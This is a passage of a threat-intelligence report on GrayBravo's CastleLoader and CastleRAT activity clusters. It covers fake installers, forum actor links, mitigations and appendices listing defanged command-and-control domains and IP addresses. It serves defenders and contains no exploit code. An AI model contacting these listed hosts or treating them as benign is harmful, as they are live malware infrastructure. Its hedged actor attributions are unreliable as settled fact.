boiksal[.]com uncovered a broader cluster of activity\r\nencompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com.\r\nThe domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare\r\nname servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.\r\nCluster 4: Malvertising and Fake Software\r\nCluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs\r\nmalvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute\r\nCastleLoader and NetSupport RAT.\r\nBased on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including\r\nwereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as\r\n37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP\r\naddresses during the period of activity.\r\nThe CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI\r\ninstallers, often bearing Extended Validation (EV) certificates, similar to those observed in previous Bumblebee campaigns.\r\nThese signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and\r\nINTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user\r\ndiscussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this\r\nyear.\r\nPossible Connection to Exploit Forum User Sparja\r\nAnalysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor\r\nnamed “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader\r\npanel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this\r\ninstance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename\r\nidentical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic\r\ncorrelation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja”\r\ninterface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32\r\n(see Figure 22).\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 15 of 39\n\nFigure 22: Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)\r\nActivity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible\r\nconnections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics\r\nrelated to malware loaders, EV certificates, and bypass software.\r\nOn December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see Figure 23). In a\r\ndocumented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private\r\nsolution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a\r\nhistory of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is\r\nunlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom\r\nloader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader\r\nfunctionality consistent with CastleLoader’s purpose.\r\nFigure 23: Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)\r\nForum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent\r\npost sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja\r\nhad circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that\r\nSparja’s development or procurement of loader-type malware was known among peers during the same operational period.\r\nFigure 24: Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 16 of 39\n\nA related CastleLoader sample, distributed as an MSI installer, was identified in Bazaar Abuse data as originating from the\r\nGitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and\r\nEmmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated\r\nGitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts\r\nlikely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.\r\nThe available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however,\r\nthe CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked\r\nto the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and\r\ninfrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS\r\nframework to distribute CastleLoader payloads or operated within the same delivery ecosystem.\r\nOn October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service,\r\nstating that they had been using the service for several months and considered the dropper reliable. This post is notable as it\r\nreinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates\r\nSparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a\r\nknown threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for\r\ndistributing Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an\r\naffiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.\r\nWhile there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums\r\nand service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with\r\nmajor ransomware distribution and loader development ecosystems.\r\nVictimology\r\nInsikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated\r\nwith CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited\r\nnumber of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed;\r\nhowever, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is\r\nimportant to note that of the entities Insikt Group identified, the infection might have occurred on individual machines\r\nwithin the network of the victim organization or by using the victim’s WiFi rather than on the organization's network\r\ndirectly. For instance, within the university context, it is likely that some victims are individual machines, such as those used\r\nby students, connected to the university's network.\r\nMitigations\r\nLeverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted,\r\nand use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly\r\ntracked as TAG-150), TAG-160, TAG-161, and other threat actors.\r\nMonitor for validated infrastructure associated with the malware families discussed in this report, including\r\nCastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate\r\nthese indicators into relevant detection and monitoring systems.\r\nLeverage Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint\r\ndetection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and\r\nMatanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.\r\nUse Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure\r\nto known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based\r\non your assets.\r\nUse the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the\r\nbroader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs),\r\npreferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and\r\nemerging developments.\r\nUse Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if\r\nyou want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.\r\nOutlook\r\nAs anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number\r\nof threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically\r\nadvanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within\r\nthe cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying\r\ncustom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term,\r\nfurther strengthening its position within the MaaS market.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 17 of 39\n\nAmong observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The\r\ncluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting\r\nfreight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an\r\nincreasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints\r\nand precise targeting.\r\nInsikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to\r\ndetect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.\r\nAppendix A: CastleLoader C2 Servers\r\nDomain IP Address First Seen\r\nicantseeyou[.]icu 80[.]77[.]25[.]239 2025-10-09\r\nanotherproject[.]icu 45[.]11[.]183[.]165 2025-10-09\r\ndonttouchthisisuseless[.]icu 80[.]77[.]25[.]88 2025-10-09\r\noldspicenotsogood[.]shop 45[.]155[.]249[.]121 2025-09-22\r\ndoyoureallyseeme[.]icu 45[.]11[.]183[.]19 2025-10-31\r\ntouchmeplease[.]icu 45[.]11[.]183[.]45 2025-10-31\r\ndonttouchme[.]life 80[.]77[.]25[.]114 2025-10-31\r\nwereatwar[.]com 172[.]86[.]90[.]58 2025-11-05\r\nrcpeformse[.]com 147[.]45[.]177[.]127 2025-11-05\r\nroject0[.]com 185[.]121[.]234[.]141 2025-11-03\r\nbethschwier[.]com 170[.]130[.]165[.]201 2025-10-12\r\nspeatly[.]com 173[.]44[.]141[.]52 2025-11-06\r\ncampanyasoft[.]com 31[.]58[.]87[.]132 2025-10-02\r\nalafair[.]net 107[.]158[.]128[.]26 2025-09-06\r\ndpeformse[.]com 147[.]45[.]177[.]127 2025-10-29\r\ncastlppwnd[.]com 31[.]58[.]50[.]160 2025-11-05\r\n(Source: Recorded Future)\r\nAppendix B: Additional Infrastructure Likely Linked to CastleLoader\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 18 of 39\n\nDomain IP Address\r\nalbafood[.]shop 15[.]197[.]240[.]20\r\nalbalk[.]lol 15[.]197[.]240[.]20\r\nbdeskthebest[.]shop 15[.]197[.]240[.]20\r\nbestproxysale[.]shop 15[.]197[.]240[.]20\r\nbestvpninfo[.]shop 15[.]197[.]240[.]20\r\nchessinthenight[.]lol 15[.]197[.]240[.]20\r\nclgenetics[.]shop 15[.]197[.]240[.]20\r\ndocusign[.]homes 15[.]197[.]240[.]20\r\ndubaialbafood[.]shop 15[.]197[.]240[.]20\r\neasyadvicesforyou[.]shop 15[.]197[.]240[.]20\r\neasyprintscreen[.]shop 15[.]197[.]240[.]20\r\nfunjobcollins[.]shop 31[.]214[.]157[.]77\r\nnort-secure[.]shop 15[.]197[.]240[.]20\r\nnorton-secure[.]shop 15[.]197[.]240[.]20\r\nnotstablecoin[.]xyz 15[.]197[.]240[.]20\r\nnotusdt[.]lol 15[.]197[.]240[.]20\r\nnvidblog[.]shop 15[.]197[.]240[.]20\r\nnvldlainfoblog[.]shop 15[.]197[.]240[.]20\r\noldspicenotsogood[.]shop 45[.]155[.]249[.]121\r\nstarkforeveryone[.]lol 15[.]197[.]240[.]20\r\nsweetdevices[.]lol 15[.]197[.]240[.]20\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 19 of 39\n\nDomain IP Address\r\ntestdomain123123[.]shop 15[.]197[.]240[.]20\r\ntradeviewdesktop[.]shop 15[.]197[.]240[.]20\r\ntradlngview-desktop[.]biz 15[.]197[.]240[.]20\r\ntradlngvlewdesktop[.]shop 15[.]197[.]240[.]20\r\ntradview-desktop[.]shop 15[.]197[.]240[.]20\r\nvipcinemade[.]shop 15[.]197[.]240[.]20\r\nvipcinemadubai[.]shop 15[.]197[.]240[.]20\r\nvipdubaicinema[.]shop 15[.]197[.]240[.]20\r\n(Source: Recorded Future)\r\nAppendix C: Logistics-Themed Infrastructure Used by TAG-160\r\nDomain IP Address First Seen Last Seen\r\nloadsschedule[.]com 199[.]79[.]62[.]141 2025-08-04 2025-11-09\r\nloadstracking[.]com Cloudflare 2025-09-19 2025-11-09\r\nloadstrucking[.]com 162[.]251[.]80[.]108 2025-05-18 2025-09-10\r\nrateconfirmations[.]com 162[.]215[.]230[.]150 2025-09-11 2025-11-09\r\ncdlfreightlogistics[.]com N/A N/A N/A\r\ndperforms[.]info 78[.]153[.]155[.]131 2025-10-01 2025-11-09\r\nenglandloglstics[.]com N/A N/A N/A\r\nenglanglogistlcs[.]com N/A N/A N/A\r\nloadstracking[.]com 207[.]174[.]212[.]141 2025-06-27 N/A\r\nhometownlogisticsllc[.]com N/A N/A N/A\r\nleemanlogisticsinc[.]com N/A N/A N/A\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 20 of 39\n\nDomain IP Address First Seen Last Seen\r\nloadplannig[.]com 204[.]11[.]58[.]80 2025-07-27 2025-11-09\r\nloads[.]icu 185[.]236[.]20[.]154 2025-09-17 2025-11-10\r\nloadsplanning[.]com 192[.]124[.]178[.]74 2025-07-26 2025-07-26\r\nloadsschedule[.]com 199[.]79[.]62[.]141 2025-08-04 2025-11-09\r\nloadstracking[.]com 207[.]174[.]212[.]141 2025-06-28 2025-07-03\r\nloadstrucking[.]com 162[.]251[.]80[.]108 2025-05-18 2025-09-10\r\nmcentireinc[.]com N/A N/A N/A\r\nmcloads[.]com 74[.]119[.]239[.]234 2025-04-18 2025-05-15\r\nmlxfreightinc[.]com N/A N/A N/A\r\nmrlogsol[.]ca N/A N/A N/A\r\npinaccletruckllc[.]com 74[.]119[.]239[.]234 2025-04-12 2025-05-14\r\nrateconfirmations[.]com 162[.]215[.]230[.]150 2025-09-11 2025-11-09\r\nredlightninglogistics[.]com Cloudflare 2025-03-21 2025-11-10\r\nredlightninglogisticsinc[.]com 74[.]119[.]239[.]234 2025-04-19 2025-05-13\r\nstarshiplogisticsgroupllc[.]com N/A N/A N/A\r\ntenderloads[.]com 162[.]215[.]241[.]215 2025-10-24 2025-11-09\r\n162[.]215[.]241[.]46 2025-09-11 2025-10-23\r\ntrucksscheduling[.]com 162[.]215[.]230[.]96 2025-08-18 2025-11-10\r\n(Source: Recorded Future)\r\nAppendix D: Booking.com-Themed Domains Linked to TAG-161\r\nDomain IP Address First Seen Last Seen\r\ncheckinastayverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 21 of 39\n\nDomain IP Address First Seen Last Seen\r\ncheckinistayverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-17\r\ncheckinstayverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\ncheckistayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-22\r\nchecksstayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-23\r\ncheckystayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-22\r\nconfirmahotelastay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-21\r\nconfirmahotelstay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-23\r\nconfirmhotelestay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-22\r\nconfirmhotelistay[.]com 185[.]39[.]19[.]181 2025-08-01 2025-10-16\r\nconfirmhotelystay[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-23\r\nconfirmstayon[.]com 185[.]39[.]19[.]181 2025-07-29 2025-10-22\r\nconfirmstayonline[.]com 185[.]39[.]19[.]181 2025-07-29 2025-10-20\r\nconfirmyhotelstay[.]com 185[.]39[.]19[.]181 2025-08-01 2025-10-22\r\nguestaformahub[.]com 185[.]39[.]19[.]180 2025-07-30 2025-10-22\r\nguestaformhub[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestaformsafe[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestaportalverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestaverifyportal[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-20\r\nguestformahub[.]com 185[.]39[.]19[.]180 2025-07-30 2025-10-23\r\nguestformasafe[.]com 185[.]39[.]19[.]180 2025-07-30 2025-10-21\r\nguestformhub[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-20\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 22 of 39\n\nDomain IP Address First Seen Last Seen\r\nguestformsafe[.]com 77[.]83[.]207[.]55 2025-07-28 2025-11-03\r\n185[.]39[.]19[.]180 N/A N/A\r\nguestistayhotel[.]com 185[.]39[.]19[.]180 2025-08-02 2025-10-21\r\nguestportalverify[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-23\r\ngueststayhotel[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-22\r\nguestverifyhub[.]com 185[.]39[.]19[.]181 2025-07-28 2025-10-22\r\nguestverifylink[.]com 185[.]39[.]19[.]180 2025-07-28 2025-10-23\r\nguestverifyportal[.]com 185[.]39[.]19[.]181 2025-07-30 2025-10-22\r\nguestystayhotel[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-22\r\nguesutastayhotel[.]com 185[.]39[.]19[.]180 2025-08-01 2025-10-21\r\nguesytastayhotel[.]com 185[.]39[.]19[.]180 2025-08-02 2025-10-22\r\nhoteliguestverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-21\r\nhotelistayverify[.]com 185[.]39[.]19[.]180 2025-07-31 2025-10-21\r\nhotelyguestverify[.]com 185[.]39[.]19[.]181 2025-07-31 2025-10-22\r\nhotelystayverify[.]com 185[.]39[.]19[.]181 2025-07-31 2025-10-23\r\nnedpihotel[.]com 185[.]39[.]19[.]181 2025-07-29 2025-10-22\r\npilolhotel[.]com 185[.]39[.]19[.]180 2025-07-29 2025-10-22\r\nroomiverifaccess[.]com 185[.]39[.]19[.]181 2025-08-02 2025-10-22\r\nroomverifaccess[.]com 185[.]39[.]19[.]181 2025-08-03 2025-10-23\r\nroomverifiaccess[.]com 185[.]39[.]19[.]181 2025-08-02 2025-10-22\r\nservicehotelonline[.]com 185[.]39[.]19[.]180 2025-08-03 2025-10-21\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 23 of 39\n\nDomain IP Address First Seen Last Seen\r\nverifihubguest[.]com 185[.]39[.]19[.]180 2025-07-28 2025-10-22\r\nverifyhubguest[.]com 185[.]39[.]19[.]181 2025-07-28 2025-10-22\r\n(Source: Recorded Future)\r\nDomain IP Address\r\nFirst\r\nSeen\r\nLast\r\nSeen\r\nNotes\r\ndok-ol[.]com 185[.]39[.]19[.]180\r\n2025-07-\r\n27\r\n2025-07-\r\n28\r\nN/A\r\n185[.]39[.]19[.]181 2025-07-28\r\n2025-11-\r\n10\r\ncik-ed[.]com 185[.]39[.]19[.]181\r\n2025-07-\r\n28\r\n2025-11-\r\n09\r\nN/A\r\nfor-es[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n25\r\n2025-11-\r\n03\r\nFound via Google\r\nkil-it[.]com 185[.]39[.]19[.]180\r\n2025-06-\r\n29\r\n2025-11-\r\n07\r\nFound via Google\r\nkip-er[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n11\r\n2025-11-\r\n09\r\nFound via Google\r\nxut-uv[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n20\r\n2025-11-\r\n08\r\nFound via Google\r\neta-cd[.]com 185[.]39[.]19[.]180\r\n2025-07-\r\n22\r\n2025-11-\r\n08\r\nFound via Google\r\nuki-fa[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n22\r\n2025-11-\r\n07\r\nFound via Google\r\nned-uj[.]com 185[.]39[.]19[.]180\r\n2025-07-\r\n10\r\n2025-11-\r\n05\r\nFound via Google\r\neto-sa[.]com 77[.]83[.]207[.]55\r\n2025-06-\r\n25\r\n2025-11-\r\n09\r\nFound via Google\r\nwal-ik[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n10\r\n2025-11-\r\n09\r\nFound via Google\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 24 of 39\n\nDomain IP Address\r\nFirst\r\nSeen\r\nLast\r\nSeen\r\nNotes\r\nmac-ig[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n20\r\n2025-11-\r\n09\r\nFound via Google\r\nmap-nv[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n11\r\n2025-11-\r\n06\r\nFound via Google\r\nipk-sa[.]com 77[.]83[.]207[.]55\r\n2025-07-\r\n18\r\n2025-11-\r\n06\r\nFound via Google\r\nher-op[.]com 185[.]39[.]19[.]180\r\n2025-06-\r\n24\r\n2025-06-\r\n24\r\nDomain used in “Completed processing task”\r\nlog, per the DOM\r\n77[.]83[.]207[.]55 2025-06-25\r\n2025-06-\r\n25\r\n(Source: Recorded Future)\r\nAppendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside\r\nthe IP Addresses that Hosted the C2 domains\r\nSteam Community Profile Link C2 Domain IP Address\r\nhxxps://steamcommunity[.]com/id/tfy5d6gohu8tgy687r7\r\ntdbfvgwe456yt[.]com\r\nmiteamss[.]com\r\n45[.]134[.]26[.]41\r\n91[.]202[.]233[.]132\r\n91[.]202[.]233[.]250\r\nhxxps://steamcommunity[.]com/id/desdsfds34324y3g\r\ngabesworld[.]com\r\nautryjones[.]com\r\n194[.]76[.]227[.]242\r\n46[.]28[.]67[.]22\r\n195[.]211[.]97[.]51\r\nhxxps://steamcommunity[.]com/id/fio34h8dsh3iufs treetankists[.]com 45[.]11[.]181[.]59\r\nhxxps://steamcommunity[.]com/id/jeg238r7staf378s kakapupuneww[.]com 45[.]135[.]232[.]149\r\nhxxps://steamcommunity[.]com/id/krouvhsin34287f7h3\r\njustnewdmain[.]com\r\nprogramsbookss[.]com\r\n192[.]109[.]138[.]102\r\n185[.]208[.]158[.]250\r\n178[.]17[.]57[.]102\r\n64[.]52[.]80[.]121\r\n45[.]32[.]69[.]11\r\n67[.]217[.]228[.]198\r\n192[.]153[.]57[.]125\r\n(Source: Recorded Future)\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 25 of 39\n\nDomain IP Address First Seen Last Seen\r\nbioskbd[.]com 178[.]17[.]57[.]103 2025-09-23 2025-09-29\r\nblkiesf[.]com Cloudflare 2025-09-25 2025-10-22\r\nboikfrs[.]com 178[.]17[.]57[.]103 2025-09-22 2025-09-29\r\nboiksal[.]com 178[.]17[.]57[.]103 2025-09-04 2025-09-10\r\nbookingnewprice109034[.]icu Cloudflare 2025-10-06 2025-10-21\r\nbookingnewprice204167[.]icu Cloudflare 2025-10-06 2025-10-20\r\nguest-request16433[.]com Cloudflare 2025-10-06 2025-10-21\r\nguest-request44565494[.]com 178[.]17[.]57[.]103 2025-09-05 2025-09-07\r\nguest-request64533[.]com 178[.]17[.]57[.]103 2025-10-06 2025-10-21\r\nguest-request666543[.]com Cloudflare 2025-10-06 2025-10-22\r\nguest-request677653[.]com Cloudflare 2025-10-06 2025-10-21\r\nguest-update666532345[.]com Cloudflare 2025-10-06 2025-10-21\r\nhotelroomprice1039375[.]icu Cloudflare 2025-10-06 2025-10-22\r\ninfo-guest44567645[.]com Cloudflare 2025-08-28 2025-09-03\r\ninfo676345677[.]com Cloudflare 2025-10-06 2025-10-21\r\nnewmessage10294[.]com Cloudflare 2025-10-09 2025-10-22\r\nrequest-info3444[.]com Cloudflare 2025-09-15 2025-09-21\r\nrequest-info4433345[.]com Cloudflare 2025-10-06 2025-10-21\r\nrequest345553[.]com Cloudflare 2025-09-15 2025-09-22\r\nrequest44456776[.]com Cloudflare 2025-10-06 2025-10-22\r\nupdate-gues3429[.]com Cloudflare 2025-09-15 2025-09-21\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 26 of 39\n\nDomain IP Address First Seen Last Seen\r\nupdate-guest4398317809[.]com Cloudflare 2025-09-14 2025-09-17\r\nupdate-info14546[.]com Cloudflare 2025-10-06 2025-10-21\r\nupdate-info3458421[.]com Cloudflare 2025-09-25 2025-10-21\r\nupdate-info4467[.]com Cloudflare 2025-10-06 2025-10-21\r\nupdate-info4468765[.]com Cloudflare 2025-08-25 2025-09-03\r\nupdate-info539156[.]com Cloudflare 2025-08-24 2025-09-02\r\nupdate-info71556[.]com Cloudflare 2025-08-28 2025-09-03\r\nupdate-reques898665[.]com Cloudflare 2025-08-21 2025-09-02\r\n(Source: Recorded Future)\r\nAppendix H: Indicators of Compromise (IoCs)\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 27 of 39\n\nCastleRAT C2 IP Addresses:\r\n5[.]35[.]44[.]176\r\n34[.]72[.]90[.]40\r\n45[.]11[.]180[.]174\r\n45[.]11[.]180[.]198\r\n45[.]11[.]181[.]59\r\n45[.]32[.]69[.]11\r\n45[.]61[.]136[.]81\r\n45[.]134[.]26[.]41\r\n45[.]135[.]232[.]149\r\n45[.]144[.]53[.]62\r\n46[.]28[.]67[.]22\r\n64[.]52[.]80[.]121\r\n66[.]63[.]187[.]224\r\n67[.]217[.]228[.]198\r\n77[.]90[.]153[.]43\r\n77[.]238[.]241[.]203\r\n79[.]132[.]130[.]148\r\n79[.]132[.]131[.]200\r\n85[.]192[.]49[.]6\r\n85[.]208[.]84[.]115\r\n87[.]120[.]93[.]167\r\n91[.]202[.]233[.]132\r\n91[.]202[.]233[.]250\r\n94[.]141[.]122[.]164\r\n102[.]135[.]95[.]102\r\n104[.]225[.]129[.]171\r\n144[.]208[.]126[.]50\r\n168[.]100[.]8[.]84\r\n178[.]17[.]57[.]102\r\n178[.]17[.]57[.]153\r\n185[.]125[.]50[.]125\r\n185[.]149[.]146[.]118\r\n185[.]156[.]248[.]24\r\n185[.]196[.]9[.]80\r\n185[.]196[.]9[.]222\r\n185[.]196[.]10[.]8\r\n185[.]196[.]11[.]171\r\n185[.]208[.]158[.]250\r\n192[.]109[.]138[.]102\r\n192[.]153[.]57[.]125\r\n194[.]76[.]227[.]242\r\n195[.]85[.]115[.]44\r\n195[.]149[.]146[.]118\r\n195[.]201[.]108[.]189\r\n195[.]211[.]97[.]51\r\nCastleRAT C2 Domains:\r\nautryjones[.]com\r\ngabesworld[.]com\r\njustnewdmain[.]com\r\nkakapupuneww[.]com\r\nmiteamss[.]com\r\nprogramsbookss[.]com\r\ntdbfvgwe456yt[.]com\r\ntreetankists[.]com\r\nSteam Community URLs:\r\nhxxps[://]steamcommunity[.]com/id/desdsfds34324y3g\r\nhxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs\r\nhxxps[://]steamcommunity[.]com/id/jeg238r7staf378s\r\nhxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3\r\nhxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7\r\nCastleLoader C2 IP Addresses:\r\n31[.]58[.]50[.]160\r\n31[.]58[.]87[.]132\r\n45[.]11[.]183[.]19\r\n45[.]11[.]183[.]45\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 28 of 39\n\n45[.]11[.]183[.]165\r\n45[.]155[.]249[.]121\r\n80[.]77[.]25[.]88\r\n80[.]77[.]25[.]114\r\n80[.]77[.]25[.]239\r\n107[.]158[.]128[.]26\r\n147[.]45[.]177[.]127\r\n170[.]130[.]165[.]201\r\n172[.]86[.]90[.]58\r\n173[.]44[.]141[.]52\r\n185[.]121[.]234[.]141\r\nCastleLoader C2 Domains:\r\nalafair[.]net\r\nanotherproject[.]icu\r\nbethschwier[.]com\r\ncampanyasoft[.]com\r\ncastlppwnd[.]com\r\ndonttouchme[.]life\r\ndonttouchthisisuseless[.]icu\r\ndoyoureallyseeme[.]icu\r\ndpeformse[.]com\r\nicantseeyou[.]icu\r\noldspicenotsogood[.]shop\r\nrcpeformse[.]com\r\nroject0[.]com\r\nspeatly[.]com\r\ntouchmeplease[.]icu\r\nwereatwar[.]com\r\nAdditional Domains:\r\nalbafood[.]shop\r\nalbalk[.]lol\r\nbdeskthebest[.]shop\r\nbestproxysale[.]shop\r\nbestvpninfo[.]shop\r\nchessinthenight[.]lol\r\nclgenetics[.]shop\r\ndocusign[.]homes\r\ndubaialbafood[.]shop\r\neasyadvicesforyou[.]shop\r\neasyprintscreen[.]shop\r\nfunjobcollins[.]shop\r\nnort-secure[.]shop\r\nnorton-secure[.]shop\r\nnotstablecoin[.]xyz\r\nnotusdt[.]lol\r\nnvidblog[.]shop\r\nnvldlainfoblog[.]shop\r\noldspicenotsogood[.]shop\r\nstarkforeveryone[.]lol\r\nsweetdevices[.]lol\r\ntestdomain123123[.]shop\r\ntradeviewdesktop[.]shop\r\ntradlngview-desktop[.]biz\r\ntradlngvlewdesktop[.]shop\r\ntradview-desktop[.]shop\r\nvipcinemade[.]shop\r\nvipcinemadubai[.]shop\r\nvipdubaicinema[.]shop\r\nCluster 1 (TAG-160) Logistics-Themed Domains:\r\ncdlfreightlogistics[.]com\r\ndperforms[.]info\r\nenglandloglstics[.]com\r\nenglanglogistlcs[.]com\r\nhometownlogisticsllc[.]com\r\nleemanlogisticsinc[.]com\r\nloadplannig[.]com\r\nloads[.]icu\r\nloadsplanning[.]com\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 29 of 